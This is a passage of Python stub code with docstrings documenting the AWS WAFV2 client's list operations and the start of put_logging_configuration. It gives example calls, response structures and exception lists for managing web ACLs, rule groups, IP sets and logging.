'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {},
'Allow': {},
'Count': {}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
},
'Capacity': 123,
'PreProcessFirewallManagerRuleGroups': [
{
'Name': 'string',
'Priority': 123,
'FirewallManagerStatement': {
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'PostProcessFirewallManagerRuleGroups': [
{
'Name': 'string',
'Priority': 123,
'FirewallManagerStatement': {
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'ManagedByFirewallManager': True|False
}
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def list_available_managed_rule_groups(Scope=None, NextMarker=None, Limit=None):
"""
Retrieves an array of managed rule groups that are available for you to use. This list includes all AWS Managed Rules rule groups and the AWS Marketplace managed rule groups that you\'re subscribed to.
See also: AWS API Documentation
Exceptions
:example: response = client.list_available_managed_rule_groups(
Scope='CLOUDFRONT'|'REGIONAL',
NextMarker='string',
Limit=123
)
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type NextMarker: string
:param NextMarker: When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
:type Limit: integer
:param Limit: The maximum number of objects that you want AWS WAF to return for this request. If more objects are available, in the response, AWS WAF provides a NextMarker value that you can use in a subsequent call to get the next batch of objects.
:rtype: dict
ReturnsResponse Syntax
{
'NextMarker': 'string',
'ManagedRuleGroups': [
{
'VendorName': 'string',
'Name': 'string',
'Description': 'string'
},
]
}
Response Structure
(dict) --
NextMarker (string) --
When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
ManagedRuleGroups (list) --
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
High-level information about a managed rule group, returned by ListAvailableManagedRuleGroups . This provides information like the name and vendor name, that you provide when you add a ManagedRuleGroupStatement to a web ACL. Managed rule groups include AWS Managed Rules rule groups, which are free of charge to AWS WAF customers, and AWS Marketplace managed rule groups, which you can subscribe to through AWS Marketplace.
VendorName (string) --
The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.
Name (string) --
The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.
Description (string) --
The description of the managed rule group, provided by AWS Managed Rules or the AWS Marketplace seller who manages it.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextMarker': 'string',
'ManagedRuleGroups': [
{
'VendorName': 'string',
'Name': 'string',
'Description': 'string'
},
]
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
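As a usage illustration, a minimal pagination sketch (the client construction and the REGIONAL scope are assumptions, not part of this reference); the same NextMarker loop applies to the other list_* operations in this module:
    import boto3
    client = boto3.client('wafv2', region_name='us-east-1')
    kwargs = {'Scope': 'REGIONAL', 'Limit': 100}
    while True:
        page = client.list_available_managed_rule_groups(**kwargs)
        for group in page['ManagedRuleGroups']:
            print(group['VendorName'], group['Name'])
        # Per the NextMarker description above, the marker is absent once
        # no further objects remain.
        marker = page.get('NextMarker')
        if not marker:
            break
        kwargs['NextMarker'] = marker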
"""
pass
def list_ip_sets(Scope=None, NextMarker=None, Limit=None):
"""
Retrieves an array of IPSetSummary objects for the IP sets that you manage.
See also: AWS API Documentation
Exceptions
:example: response = client.list_ip_sets(
Scope='CLOUDFRONT'|'REGIONAL',
NextMarker='string',
Limit=123
)
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type NextMarker: string
:param NextMarker: When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
:type Limit: integer
:param Limit: The maximum number of objects that you want AWS WAF to return for this request. If more objects are available, in the response, AWS WAF provides a NextMarker value that you can use in a subsequent call to get the next batch of objects.
:rtype: dict
ReturnsResponse Syntax
{
'NextMarker': 'string',
'IPSets': [
{
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
},
]
}
Response Structure
(dict) --
NextMarker (string) --
When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
IPSets (list) --
Array of IPSets. This may not be the full list of IPSets that you have defined. See the Limit specification for this request.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
High-level information about an IPSet , returned by operations like create and list. This provides information like the ID, that you can use to retrieve and manage an IPSet , and the ARN, that you provide to the IPSetReferenceStatement to use the address set in a Rule .
Name (string) --
The name of the IP set. You cannot change the name of an IPSet after you create it.
Id (string) --
A unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
Description (string) --
A description of the IP set that helps with identification. You cannot change the description of an IP set after you create it.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextMarker': 'string',
'IPSets': [
{
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
},
]
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def list_logging_configurations(Scope=None, NextMarker=None, Limit=None):
"""
Retrieves an array of your LoggingConfiguration objects.
See also: AWS API Documentation
Exceptions
:example: response = client.list_logging_configurations(
Scope='CLOUDFRONT'|'REGIONAL',
NextMarker='string',
Limit=123
)
:type Scope: string
:param Scope: Specifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type NextMarker: string
:param NextMarker: When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
:type Limit: integer
:param Limit: The maximum number of objects that you want AWS WAF to return for this request. If more objects are available, in the response, AWS WAF provides a NextMarker value that you can use in a subsequent call to get the next batch of objects.
:rtype: dict
ReturnsResponse Syntax
{
'LoggingConfigurations': [
{
'ResourceArn': 'string',
'LogDestinationConfigs': [
'string',
],
'RedactedFields': [
{
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
]
},
],
'NextMarker': 'string'
}
Response Structure
(dict) --
LoggingConfigurations (list) --
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Defines an association between Amazon Kinesis Data Firehose destinations and a web ACL resource, for logging from AWS WAF. As part of the association, you can specify parts of the standard logging fields to keep out of the logs.
ResourceArn (string) --
The Amazon Resource Name (ARN) of the web ACL that you want to associate with LogDestinationConfigs .
LogDestinationConfigs (list) --
The Amazon Kinesis Data Firehose Amazon Resource Name (ARNs) that you want to associate with the web ACL.
(string) --
RedactedFields (list) --
The parts of the request that you want to keep out of the logs. For example, if you redact the cookie field, the cookie field in the firehose will be xxx .
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The part of a web request that you want AWS WAF to inspect. Include the single FieldToMatch type that you want to inspect, with additional specifications as needed, according to the type. You specify a single request component in FieldToMatch for each rule statement that requires it. To inspect more than one component of a web request, create a separate rule statement for each component.
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
NextMarker (string) --
When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'LoggingConfigurations': [
{
'ResourceArn': 'string',
'LogDestinationConfigs': [
'string',
],
'RedactedFields': [
{
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
]
},
],
'NextMarker': 'string'
}
:returns:
(string) --
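A small hedged sketch (reusing a hypothetical client as in the earlier pagination example) that prints each logging configuration's destination ARNs:
    response = client.list_logging_configurations(Scope='REGIONAL')
    for config in response['LoggingConfigurations']:
        # Each entry pairs a web ACL ARN with its Kinesis Data Firehose ARNs.
        print(config['ResourceArn'], config['LogDestinationConfigs'])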
"""
pass
def list_regex_pattern_sets(Scope=None, NextMarker=None, Limit=None):
"""
Retrieves an array of RegexPatternSetSummary objects for the regex pattern sets that you manage.
See also: AWS API Documentation
Exceptions
:example: response = client.list_regex_pattern_sets(
Scope='CLOUDFRONT'|'REGIONAL',
NextMarker='string',
Limit=123
)
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type NextMarker: string
:param NextMarker: When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
:type Limit: integer
:param Limit: The maximum number of objects that you want AWS WAF to return for this request. If more objects are available, in the response, AWS WAF provides a NextMarker value that you can use in a subsequent call to get the next batch of objects.
:rtype: dict
ReturnsResponse Syntax
{
'NextMarker': 'string',
'RegexPatternSets': [
{
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
},
]
}
Response Structure
(dict) --
NextMarker (string) --
When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
RegexPatternSets (list) --
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
High-level information about a RegexPatternSet , returned by operations like create and list. This provides information like the ID, that you can use to retrieve and manage a RegexPatternSet , and the ARN, that you provide to the RegexPatternSetReferenceStatement to use the pattern set in a Rule .
Name (string) --
The name of the data type instance. You cannot change the name after you create the instance.
Id (string) --
A unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
Description (string) --
A description of the set that helps with identification. You cannot change the description of a set after you create it.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextMarker': 'string',
'RegexPatternSets': [
{
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
},
]
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def list_resources_for_web_acl(WebACLArn=None, ResourceType=None):
"""
Retrieves an array of the Amazon Resource Names (ARNs) for the regional resources that are associated with the specified web ACL. If you want the list of AWS CloudFront resources, use the AWS CloudFront call ListDistributionsByWebACLId .
See also: AWS API Documentation
Exceptions
:example: response = client.list_resources_for_web_acl(
WebACLArn='string',
ResourceType='APPLICATION_LOAD_BALANCER'|'API_GATEWAY'
)
:type WebACLArn: string
:param WebACLArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the Web ACL.\n
:type ResourceType: string
:param ResourceType: Used for web ACLs that are scoped for regional applications. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.
:rtype: dict
ReturnsResponse Syntax
{
'ResourceArns': [
'string',
]
}
Response Structure
(dict) --
ResourceArns (list) --
The array of Amazon Resource Names (ARNs) of the associated resources.
(string) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'ResourceArns': [
'string',
]
}
:returns:
(string) --
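For illustration, a minimal sketch (the web ACL ARN is a made-up placeholder) that lists the Application Load Balancers associated with a web ACL:
    response = client.list_resources_for_web_acl(
        WebACLArn='arn:aws:wafv2:us-east-1:123456789012:regional/webacl/my-acl/abcd-1234',
        ResourceType='APPLICATION_LOAD_BALANCER'
    )
    for arn in response['ResourceArns']:
        print(arn)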
"""
pass
def list_rule_groups(Scope=None, NextMarker=None, Limit=None):
"""
Retrieves an array of RuleGroupSummary objects for the rule groups that you manage.
See also: AWS API Documentation
Exceptions
:example: response = client.list_rule_groups(
Scope='CLOUDFRONT'|'REGIONAL',
NextMarker='string',
Limit=123
)
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type NextMarker: string
:param NextMarker: When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
:type Limit: integer
:param Limit: The maximum number of objects that you want AWS WAF to return for this request. If more objects are available, in the response, AWS WAF provides a NextMarker value that you can use in a subsequent call to get the next batch of objects.
:rtype: dict
ReturnsResponse Syntax
{
'NextMarker': 'string',
'RuleGroups': [
{
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
},
]
}
Response Structure
(dict) --
NextMarker (string) --
When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
RuleGroups (list) --
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
High-level information about a RuleGroup , returned by operations like create and list. This provides information like the ID, that you can use to retrieve and manage a RuleGroup , and the ARN, that you provide to the RuleGroupReferenceStatement to use the rule group in a Rule .
Name (string) --
The name of the data type instance. You cannot change the name after you create the instance.
Id (string) --
A unique identifier for the rule group. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
Description (string) --
A description of the rule group that helps with identification. You cannot change the description of a rule group after you create it.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextMarker': 'string',
'RuleGroups': [
{
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
},
]
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def list_tags_for_resource(NextMarker=None, Limit=None, ResourceARN=None):
"""
Retrieves the TagInfoForResource for the specified resource.
See also: AWS API Documentation
Exceptions
:example: response = client.list_tags_for_resource(
NextMarker='string',
Limit=123,
ResourceARN='string'
)
:type NextMarker: string
:param NextMarker: When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
:type Limit: integer
:param Limit: The maximum number of objects that you want AWS WAF to return for this request. If more objects are available, in the response, AWS WAF provides a NextMarker value that you can use in a subsequent call to get the next batch of objects.
:type ResourceARN: string
:param ResourceARN: [REQUIRED]\nThe Amazon Resource Name (ARN) of the resource.\n
:rtype: dict
ReturnsResponse Syntax
{
'NextMarker': 'string',
'TagInfoForResource': {
'ResourceARN': 'string',
'TagList': [
{
'Key': 'string',
'Value': 'string'
},
]
}
}
Response Structure
(dict) --
NextMarker (string) --
When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
TagInfoForResource (dict) --
The collection of tagging definitions for the resource.
ResourceARN (string) --
The Amazon Resource Name (ARN) of the resource.
TagList (list) --
The array of Tag objects defined for the resource.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A collection of key:value pairs associated with an AWS resource. The key:value pair can be anything you define. Typically, the tag key represents a category (such as "environment") and the tag value represents a specific value within that category (such as "test," "development," or "production"). You can add up to 50 tags to each AWS resource.
Key (string) --
Part of the key:value pair that defines a tag. You can use a tag key to describe a category of information, such as "customer." Tag keys are case-sensitive.
Value (string) --
Part of the key:value pair that defines a tag. You can use a tag value to describe a specific value within a category, such as "companyA" or "companyB." Tag values are case-sensitive.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextMarker': 'string',
'TagInfoForResource': {
'ResourceARN': 'string',
'TagList': [
{
'Key': 'string',
'Value': 'string'
},
]
}
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def list_web_acls(Scope=None, NextMarker=None, Limit=None):
"""
Retrieves an array of WebACLSummary objects for the web ACLs that you manage.
See also: AWS API Documentation
Exceptions
:example: response = client.list_web_acls(
Scope='CLOUDFRONT'|'REGIONAL',
NextMarker='string',
Limit=123
)
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type NextMarker: string
:param NextMarker: When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
:type Limit: integer
:param Limit: The maximum number of objects that you want AWS WAF to return for this request. If more objects are available, in the response, AWS WAF provides a NextMarker value that you can use in a subsequent call to get the next batch of objects.
:rtype: dict
ReturnsResponse Syntax
{
'NextMarker': 'string',
'WebACLs': [
{
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
},
]
}
Response Structure
(dict) --
NextMarker (string) --
When you request a list of objects with a Limit setting, if the number of objects that are still available for retrieval exceeds the limit, AWS WAF returns a NextMarker value in the response. To retrieve the next batch of objects, provide the marker from the prior call in your next request.
WebACLs (list) --
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
High-level information about a WebACL , returned by operations like create and list. This provides information like the ID, that you can use to retrieve and manage a WebACL , and the ARN, that you provide to operations like AssociateWebACL .
Name (string) --
The name of the Web ACL. You cannot change the name of a Web ACL after you create it.
Id (string) --
The unique identifier for the Web ACL. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
Description (string) --
A description of the Web ACL that helps with identification. You cannot change the description of a Web ACL after you create it.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextMarker': 'string',
'WebACLs': [
{
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
},
]
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def put_logging_configuration(LoggingConfiguration=None):
"""
Enables the specified LoggingConfiguration , to start logging from a web ACL, according to the configuration provided.
You can access information about all traffic that AWS WAF inspects using the following steps:
Create an Amazon Kinesis Data Firehose.
Associate that firehose to your web ACL using a PutLoggingConfiguration request.
When you successfully enable logging using a PutLoggingConfiguration request, AWS WAF will create a service linked role with the necessary permissions to write logs to the Amazon Kinesis Data Firehose. For more information, see Logging Web ACL Traffic Information in the AWS WAF Developer Guide .
See also: AWS API Documentation
Exceptions
:example: response = client.put_logging_configuration(
LoggingConfiguration={
'ResourceArn': 'string',
'LogDestinationConfigs': [
'string',
],
'RedactedFields': [
{
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
]
}
)
:type LoggingConfiguration: dict
:param LoggingConfiguration: [REQUIRED]\n\nResourceArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the web ACL that you want to associate with LogDestinationConfigs .\n\nLogDestinationConfigs (list) -- [REQUIRED]The Amazon Kinesis Data Firehose Amazon Resource Name (ARNs) that you want to associate with the web ACL.\n\n(string) --\n\n\nRedactedFields (list) --The parts of the request that you want to keep out of the logs. For example, if you redact the cookie field, the cookie field in the firehose will be xxx .\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe part of a web request that you want AWS WAF to inspect. Include the single FieldToMatch type that you want to inspect, with additional specifications as needed, according to the type. You specify a single request component in FieldToMatch for each rule statement that requires it. To inspect more than one component of a web request, create a separate rule statement for each component.\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to 